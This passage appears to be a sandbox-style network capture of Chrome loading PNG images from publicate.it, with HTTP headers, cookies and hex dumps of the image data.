                                                                                                                                                                                                        2024-08-30 16:16:27 UTC710INData Raw: 31 20 31 37 2e 30 33 37 37 31 38 34 2c 32 39 2e 39 33 31 37 32 32 35 20 43 31 35 2e 33 37 37 32 39 33 39 2c 33 30 2e 39 30 31 35 32 38 20 31 33 2e 34 35 39 37 32 34 2c 33 31 2e 33 38 36 34 33 30 37 20 31 31 2e 32 38 35 30 30 38 38 2c 33 31 2e 33 38 36 34 33 30 37 20 5a 22 20 69 64 3d 22 50 61 74 68 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 69 64 3d 22 50 61 74 68 22 20 70 6f 69 6e 74 73 3d 22 32 38 2e 34 35 33 38 31 33 33 20 33 30 2e 38 35 37 34 34 35 39 20 34 30 2e 30 39 31 34 37 38 36 20 34 2e 38 30 34 39 34 35 31 35 20 32 34 2e 38 38 33 31 36 35 39 20 34 2e 38 30 34 39 34 35 31 35 20 32 34 2e 38 38 33 31 36 35 39 20 30 20 34 35 2e 39 31 30 33 31 31 32 20 30 20 34 35
                                                                                                                                                                                                        Data Ascii: 1 17.0377184,29.9317225 C15.3772939,30.901528 13.459724,31.3864307 11.2850088,31.3864307 Z" id="Path"></path> <polygon id="Path" points="28.4538133 30.8574459 40.0914786 4.80494515 24.8831659 4.80494515 24.8831659 0 45.9103112 0 45


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        127192.168.2.549917104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC704OUTGET /images/adobe_review.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:27 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 8100
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "1fa4-620aa1d1336be"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FajkSyUAeUsCC4HgoBOt%2BY9i2MeahlXgjSUxIrMjCsgexMg71Quk%2BNlVJ7U5Y8thnf9%2Bky8fQjqfcFEnoDQLiaGgmK%2FopHBjp51u1axxVlaErHDwbaPp7e2%2BHVAj4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615dc58ec7cee-EWR
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC619INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 82 00 00 00 82 08 06 00 00 00 8a 03 10 fd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 35 20 37 39 2e 31 36 34 35 39 30 2c 20 32 30 32 30 2f 31 32 2f 30 39 2d 31 31 3a 35 37 3a 34 34 20 20
                                                                                                                                                                                                        Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c005 79.164590, 2020/12/09-11:57:44
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 35 31 35 33 31 41 37 41 33 36 31 34 31 31 45 44 38 31 31 37 41 36 41 39 45 42 42 38 41 32 37 46 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 35 31 35 33 31 41 37 37 33 36 31 34 31 31 45 44 38 31 31 37 41 36 41 39 45 42 42 38 41 32 37 46 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 35 31 35 33 31 41 37 38 33 36 31 34 31 31 45 44 38 31 31 37 41 36 41 39 45 42 42 38 41 32 37 46 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20
                                                                                                                                                                                                        Data Ascii: xmpMM:DocumentID="xmp.did:51531A7A361411ED8117A6A9EBB8A27F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:51531A77361411ED8117A6A9EBB8A27F" stRef:documentID="xmp.did:51531A78361411ED8117A6A9EBB8A27F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 60 c5 25 a5 2d a5 e5 15 f7 cf 4e 99 f6 b1 27 c9 d0 9d 08 9a f3 bf dd 48 90 9d b3 3a 21 3e ee d5 11 51 11 7a 59 e0 45 2b ab a8 92 8b 8b 4b 1e 99 95 32 6d a3 13 b0 5d d2 11 b6 44 e8 5b 3a 40 12 8c 4c 4c f8 6b 64 44 98 8e 54 3f 58 65 55 0d a6 8a 0b 0f 3b 21 83 4b 91 c1 19 11 34 3f a7 74 90 18 1f b7 5d 8f 04 fd 6b e5 18 19 8a 8a 4b 56 3a 49 13 9a 9f 0b 1a ea 4c a7 15 45 56 d6 a1 79 a4 09 74 12 f4 bf 91 cf c9 f7 84 81 c6 9e 81 43 2c 05 37 74 41 d7 df 99 99 99 93 47 44 8f d8 a1 0b c3 ab 67 e4 7b c2 80 b0 e8 0d 2f 67 e9 5e 70 97 04 7b f6 ec 89 8f 8c 8e fb 98 4a 44 1d 8e ab 6b 84 01 61 41 98 b8 4b 06 b1 97 aa c1 ee ce d6 ae 5d 2b 2d 5c b4 e4 c3 a4 31 a3 26 e9 2d e3 ab 6f d4 ab 09 0e 32 99 5a db 95 d9 96 f6 d6 cd d9 d9 d9 8a ab 64 60 1d 64 d0 4c 02 fa fb d0 e1 a3
                                                                                                                                                                                                        Data Ascii: `%-N'H:!>QzYE+K2m]D[:@LLkdDT?XeU;!K4?t]kKV:ILEVytC,7tAGDg{/g^p{JDkaAK]+-\1&-o2Zd`dL
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 99 66 ad c1 62 e3 51 2b 2c 05 05 df eb a9 f1 42 e5 2d 7f e9 79 10 1e fc 0e 88 0f dc 09 b0 f6 7e 50 3e 78 4f db 7b e9 b0 0c 06 cc 71 b4 f8 90 d2 72 79 24 33 02 dc cf 1f 1d 22 aa d5 13 13 af fe 4d 40 c4 01 01 55 bc a9 5f a2 81 29 48 15 80 2c 3e 51 fb 1b fd d1 61 d7 cd 03 65 d6 f5 e0 31 77 d5 54 81 72 30 0b 30 3b ab 0b 98 1b 00 8e 1c b2 8e f0 de ce 03 49 c0 0d 3e 1e 0b e3 74 39 98 13 99 ae f2 3c 54 c4 01 49 32 88 5e ff 2a 93 7a c2 91 51 c0 56 de ef 34 ec 02 69 15 5b 27 e3 e8 61 89 a3 55 ad 00 5f 67 f4 fd 40 cc 66 50 8e 1d 01 a8 28 55 53 01 8b 8b 57 f3 bd 7c fa 14 48 87 0f 01 dc ba dc 7e 24 68 40 b2 64 ee 03 7e ae 00 e0 d0 7e ba c5 c7 f1 67 14 15 82 82 c4 82 ea 6a 60 a1 58 f5 4c 9d e6 b8 e9 d5 88 3a e3 b3 4f 80 1f 3e a8 46 09 36 09 f5 d3 84 c9 54 dc db d5 27
                                                                                                                                                                                                        Data Ascii: fbQ+,B-y~P>xO{qry$3"M@U_)H,>Qae1wTr00;I>t9<TI2^*zQV4i['aU_g@fP(USW|H~$h@d~~gj`XL:O>F6T'
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: c4 22 29 03 03 bb da d2 22 a5 86 a0 60 10 c6 4f 52 b5 94 bb 46 1c 90 14 45 31 7b 2d 2d 20 bb c5 3b 56 da 7f 11 47 9d b2 77 37 48 95 15 97 bb 86 14 96 f7 7d ae 76 fd d4 6e 9f ad 51 38 9e 31 13 d8 e4 6b 40 29 3c ab 3a 4d f3 71 d4 54 03 27 c5 4d ad 6a 74 a4 25 e6 b2 ca 56 9d 8e 11 09 aa 2b d4 c8 24 1f c5 88 b3 60 11 40 e4 08 b5 25 ce 50 94 a9 15 05 35 c2 88 9c a4 e4 3b 81 26 40 4c 41 00 61 e1 d6 f5 48 38 8e 9a 87 63 29 cc f0 73 28 8c 73 ac 48 18 7d 3e 86 71 16 1c 7a 45 73 4c 2d ab e9 9e 0a 22 0f f9 63 ff 57 20 62 84 51 e8 c2 1c 82 ce 51 c3 b0 a0 10 95 10 4a 78 38 48 ff f9 1c c0 c2 5b ac fd 95 ce c1 e6 89 aa 0e 39 20 59 da e5 46 6f 90 40 42 86 ca d4 4e 8e 4f b0 f7 c9 c0 cf 9f 03 e5 f8 91 9e 27 82 a2 48 d9 ba 11 c4 ff 7c ae e7 88 c1 51 c1 16 2f 05 19 6b 7a 09
                                                                                                                                                                                                        Data Ascii: ")"`ORFE1{-- ;VGw7H}vnQ81k@)<:MqT'Mjt%V+$`@%P5;&@LAaH8c)s(sH}>qzEsL-"cW bQQJx8H[9 YFo@BNO'H|Q/kz
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 17 96 d6 d6 b4 c6 a6 66 dd 33 c3 cc 08 73 c2 be 8b 08 39 39 b9 5f 61 19 a1 7f 65 68 98 19 61 4e d8 77 46 5e f5 9e ab dc 6f f2 33 27 24 27 5d ab bb 67 f8 d8 e9 bc 33 47 27 8e 1f 37 b7 2b 22 58 9b 7d cd 69 b2 0b 57 f4 74 1b dc 46 58 13 e6 5d 45 1b 74 5c 46 6f 69 6d 4a d7 75 c2 30 d2 07 8d cd 2a e6 1d 4f 2f 4f d3 ff 65 5a da 57 e6 06 73 8b ee a2 e1 61 0d 66 73 0b 61 0e 36 d5 99 7f 67 95 76 e4 d8 c9 37 af 9d 32 71 a5 3e d7 e2 d0 36 ea d1 1c 3d 91 bb 7d fa 35 93 bf d7 23 22 90 99 cd e6 77 ea eb cd ba a7 86 b8 11 c6 84 b5 ed ba 2b 88 f0 f3 a7 9f d8 5b 53 5b 5b ae bb 6a 68 1b 61 4c 58 db 23 82 2a 18 33 32 32 e4 da ba fa 77 2d 16 8b ee ad 21 6a 84 2d 61 4c 58 db 62 df a3 a7 5c 5d 57 fd 4e 6d 5d 83 ee b1 21 6a 48 02 15 e3 ee eb 7b 10 61 f1 82 05 27 2a ab aa b3 75
                                                                                                                                                                                                        Data Ascii: f3s99_aehaNwF^o3'$']g3G'7+"X}iWtFX]Et\FoimJu0*O/OeZWsafsa6gv72q>6=}5#"w+[S[[jhaLX#*322w-!j-aLXb\]WNm]!jH{a'*u
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC636INData Raw: 1f 1f 33 d9 14 18 30 ac 08 40 df 40 a2 2f 9f 5c 2c 29 59 b7 70 61 6a 56 3f 00 cf 9d 75 16 45 27 e0 f7 07 19 20 35 35 55 fa cd 6f 7e 7f 5f 44 54 f8 4f 47 44 45 8e 0d 0e 32 0d 69 02 d0 17 52 e9 bb 88 55 15 d5 2f 3d fb ec d3 ef a4 a5 a5 59 34 96 7d 5e 21 81 23 22 f4 17 19 7a bc 96 92 92 22 6c d8 f0 e7 3b c3 23 c2 9f 8c 89 8e 9a 14 12 12 34 a4 08 40 f3 13 94 96 55 9c aa ae aa 5e ff f8 e3 ff be 23 3b 3b 5b 71 01 2c af 91 a0 13 08 01 ec 4f 82 ee 2d 32 f4 fa 5a 44 44 04 ec d8 f1 d1 d2 f0 c8 c8 27 23 23 c2 53 42 91 10 92 34 38 45 a5 75 ce a2 06 a0 59 68 aa 2b 2b d7 a3 06 f8 a4 aa aa ca 15 d0 bd 4e 82 ce aa 41 8b 58 74 97 18 ee 6e d7 f5 7c e7 ae 5d 53 a2 23 63 ee 0d 0b 0b 59 19 16 1a 3a 22 38 d8 04 03 fd fa 05 5d 17 a0 29 ec 68 f6 b2 9a 9a ba ed 65 95 a5 5b 97 2d
                                                                                                                                                                                                        Data Ascii: 30@@/\,)YpajV?uE' 55Uo~_DTOGDE2iRU/=Y4}^!#"z"l;#4@U^#;;[q,O-2ZDD'##SB48EuYh++NAXtn|]S#cY:"8])he[-


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        128192.168.2.549918104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC707OUTGET /images/Trustpilot_logo.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:27 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 5816
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "16b8-620aa1d0eb27a"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAVDqyQQb80NXWWYXukgrU%2B1rr7apmvKfJMXQ5IqtuxzGG9nV3CNAk9Qiee%2FYAhSFFLh1aXGu9zgUHv7mWGXdqw28%2F%2B2nv22nCtcsCv9Ig7pdJd1H8GHXzVYWc9Ngg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615dce91c8c93-EWR
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC621INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 aa 00 00 00 2e 08 06 00 00 00 b8 57 82 4c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 38 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 02 a0 02 00 04 00 00 00 01 00 00 00 aa a0 03 00 04 00 00 00 01 00 00 00 2e 00 00 00 00 b8 de ea 19 00 00 16 2b 49 44 41 54 78 01 ed 9c 09 98 54 d5 95 c7 df 52 d5 7b d3 0d 34 0d 34 0d 22 a0 01 51 a3 e0 9a 91 cd 6d 04 45 44 03 93 cf cc 37 9a 8c 5b 5c 32 43 34 1a 71 be d8 71 1c 31 9a 38 c6 6f cc 44 27 7e 32 46 c7 a5 05 14 8c 6b 8c 8c 18 45 45 1d 30 88 2c b2 76 37 6b b3 34 4d 53 dd 55 f5 de fc fe af eb 15 d5 45 75 77 75 53 b8 d6 e5 bb 7d ee 72 ee 39 e7 9e 7b ee b9 db 2b 0c 23 1b b2 1a c8 6a 20 ab 81 ac 06 be a4
                                                                                                                                                                                                        Data Ascii: PNGIHDR.WLgAMAa8eXIfMM*i.+IDATxTR{44"QmED7[\2C4qq18oD'~2FkEE0,v7k4MSUEuwuS}r9{+#j
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 54 d7 30 23 86 31 c9 35 ad 94 74 28 37 1c d7 39 ef aa 25 3c 06 64 43 56 03 87 a0 01 73 e2 8b 55 3d 82 61 a3 28 90 db e2 1a fb d2 a7 14 ca cb 71 73 0d a3 87 19 71 5e 37 03 56 a5 13 65 a9 4f 0a a6 e9 5d 54 ed 30 5b 22 7f 0b 7e 5d 5e a8 a5 ed 46 36 09 bf 4d b6 d0 30 22 56 8e 69 ec 6f da 3b 7f ca 3d 7b 13 ea 72 ca ca ca 7a 27 e4 bb 9c b4 6d 3b ba 75 eb d6 1d 34 3c 58 e8 2e 53 fb 5a 35 08 f6 e9 d3 a7 37 87 61 6f 9c 76 ec d8 b1 93 de 35 ab 87 25 25 25 3d 83 c1 a0 f7 da 18 0e 87 43 7b f6 ec d9 f5 79 f6 3c 50 10 0e 1f ed d8 39 67 99 d1 bc 72 b7 90 f5 3a cd a1 2b 30 cc a8 eb 3a 95 8e 65 f4 c3 6d a6 94 59 a7 7f 8c b5 cc 2c c8 b9 a5 c0 b5 d6 3b f9 b9 76 4a c4 e4 42 fc b3 c5 bf 9c 96 e8 ce a8 95 fb 47 aa 97 11 3d 26 e5 e5 e5 03 03 81 c0 8f 92 9b 74 25 ef 38 ce de d2
                                                                                                                                                                                                        Data Ascii: T0#15t(79%<dCVsU=a(qsq^7VeO]T0["~]^F6M0"Vio;={rz'm;u4<X.SZ57aov5%%%=C{y<P9gr:+0:emY,;vJBG=&t%8
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: fb f6 3d 40 9d 8c d2 80 ce ed a4 35 c1 fe 9e 38 0c 5a a5 e0 59 f4 bb 09 b8 99 ba f7 90 e9 69 26 d3 62 f2 ad 84 49 70 98 19 02 ee 83 24 75 3b 63 62 40 37 63 f4 ef 92 4e 27 e4 42 73 1c fd 9c 0a f2 09 c0 be d0 e2 92 b1 75 e2 22 d7 36 ca 96 41 73 3e 13 f5 4f fe 89 7e c0 80 01 ea db 03 e0 ca 83 8e 24 ad 26 ea f3 28 c0 6c a5 15 da 35 54 55 3e 37 b5 6a 37 9f f0 55 bb 05 c7 d5 46 0c e7 32 4e ed 53 b8 c3 2f 3b 14 63 e5 9b 55 49 be 9b 4d e9 82 a8 13 fd ef f2 01 95 6f 3e 7c d2 d5 ed 2d c3 12 23 e3 01 65 8c 22 fa c6 a7 4d fb 24 f2 ff 80 72 e4 55 3d 7e 18 81 37 bb 29 d3 56 62 8c 0a d1 e5 46 af 32 c5 1f f0 8e f1 f1 48 8b 88 37 49 e4 a9 19 a4 1b c8 5f 46 ac 8c 35 6d 00 47 46 a3 bd e0 d0 58 1c 4d fb 11 0c dc cc da da da 77 68 23 43 93 51 6a 82 24 4e 38 95 97 ab 8c 81 d7
                                                                                                                                                                                                        Data Ascii: =@58ZYi&bIp$u;cb@7cN'Bsu"6As>O~$&(l5TU>7j7UF2NS/;cUIMo>|-#e"M$rU=~7)VbF2H7I_F5mGFXMwh#CQj$N8
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1369INData Raw: 26 c8 ba f6 88 50 57 c3 a4 d0 b8 cb 50 15 46 b4 82 ce ff a6 ed 51 ab f8 92 7f a9 61 e8 aa 8a 2b aa 76 08 d3 6d 93 6b 81 16 3c e7 ee 75 35 c6 9e 4d 9b 8d 70 28 6c 94 0c ea 6f e4 96 16 1b 79 25 45 46 7e 59 a9 19 cc cb 1d 8b 72 66 33 70 69 b8 e6 76 78 65 ae 78 63 2a 0f 90 29 f2 2c f1 75 1c 1c ee 62 40 b7 c7 96 dc 23 e8 7b 1f fa 5e 4e d4 ed 83 4b 5d 3d 60 13 f9 0f 19 c8 27 30 d6 ff 85 7f 7b 5a ee 54 34 e8 78 87 a3 f6 10 99 10 5b 99 20 be a1 ea d9 b9 57 7b b8 9d 95 23 b7 56 09 0f 8d b4 f6 22 1d 6d 21 f8 90 c9 ad f5 f1 81 3d c0 57 e3 4e ed 20 6d 43 7d ff a4 50 09 1f f6 71 f9 df 2a 94 27 59 e2 1f 9d e8 91 c2 89 44 6a 42 bb 1b 2a b8 c2 b2 4b 06 55 60 9c c5 46 4e 51 81 11 2c cc e7 9b 17 9b a5 df 36 9c 48 74 cc 94 f9 b7 e9 aa c4 db 9b 24 92 f9 02 d2 87 7d bf cc 5e
                                                                                                                                                                                                        Data Ascii: &PWPFQa+vmk<u5Mp(loy%EF~Yrf3pivxexc*),ub@#{^NK]=`'0{ZT4x[ W{#V"m!=WN mC}Pq*'YDjB*KU`FNQ,6Ht$}^
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1088INData Raw: e3 f4 e9 68 d2 57 11 73 90 4b 77 ab c3 e8 f7 6e 78 69 55 d1 d7 5b 03 80 da 83 eb bd f7 51 f0 1f 21 1d 5f 45 48 eb a1 e3 7d 26 ce e5 4a 83 2f 8f 7a 03 b8 da 7a 05 da 13 4a b8 5e 98 f6 4c 55 2f d3 75 c7 e3 d7 51 bf f7 0e 3c 9b 63 c3 75 fc 9f 7d 0b e6 5d 5c d5 be 91 fa 04 80 f3 2e 9e 55 bf ab de 7a 25 e8 46 af e7 87 2b bf 83 d6 7e 0d a5 e3 ba 67 af 3c 31 d8 27 01 f5 90 92 74 4a 1d 97 d1 f8 31 e5 04 40 09 ba 80 6f 8e e1 b6 51 56 b2 00 f2 18 28 fd 36 da bc 43 9d de ea f5 79 de d1 44 19 db 71 44 5d 2d dd 22 25 fb 34 81 f1 2b 1a 9e 07 f5 b5 92 3c c3 ef 88 db 48 cb 30 b5 0c 9e 18 8b 7a 7a d4 3b 7f 0d f5 fa 8a e8 16 bc a4 d2 f1 40 bd 56 9d 79 c4 46 f0 e4 3d fb 51 36 10 58 4c 6c 13 a8 d7 12 fc aa e8 00 c5 db 93 95 3e 48 56 df 48 d7 51 5f 45 dd 43 34 0e 25 10 10 ed
                                                                                                                                                                                                        Data Ascii: hWsKwnxiU[Q!_EH}&J/zzJ^LU/uQ<cu}]\.Uz%F+~g<1'tJ1@oQV(6CyDqD]-"%4+<H0zz;@VyF=Q6XLl>HVHQ_EC4%


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        129192.168.2.549919104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC743OUTGET /images/template1-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:27 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 86062
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "1502e-620aa1d11719d"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kLK0OZ%2B8WeLE%2BmDDyFxomixDNSizFcmAoFfCHojYhX6gMN3mv5HYutV%2FQMebCi2Vnu3mzWkXWCMKXRSEvNBS7C%2Fd4zetNMtF6WvMIeoFPeRd6HS5EKxfH3viQFqPXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615dd1f4d41b4-EWR
